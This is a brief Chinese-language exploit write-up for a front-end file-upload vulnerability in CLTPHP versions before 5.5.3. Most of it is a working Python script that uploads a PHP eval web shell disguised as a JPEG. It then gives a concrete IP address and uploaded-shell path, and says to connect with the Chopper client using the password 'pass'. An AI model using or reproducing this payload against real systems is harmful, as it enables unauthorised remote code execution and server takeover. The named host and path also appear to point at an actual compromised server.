cltphp是一个利用thinkphp开发的业务系统,该业务系统在5.5.3之前存在一个上传漏洞,可以通过前台getshell
准备CTLPHP5.5.2环境

payload
import requests
import sys
def CLPHP_upload(url):
header = { 'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' ,
'X-Requested-With': 'XMLHttpRequest',}
geturl = url+"/user/upFiles/upload"
files ={'file':('1.php','<?php eval($_POST["pass"]) ?>','image/jpeg')}
res = requests.post(geturl, files=files,headers=header)
print(res.text)
if __name__ == "__main__":
if len(sys.argv) == 2:
url=sys.argv[1]
CLPHP_upload(url)
sys.exit(0)
else:
print ("usage: %s www.xxx.com" % sys.argv[0])
sys.exit(-1)
然后直接执行命令:

然后链接shell,路径就是:
http://144.76.229.248:8002/public/+上传路径
http://144.76.229.248:8002/public//uploads//20201010//38d7adcb21834c466b676cc3255cbc02.php
用菜刀链接,密码为pass

大概就这些......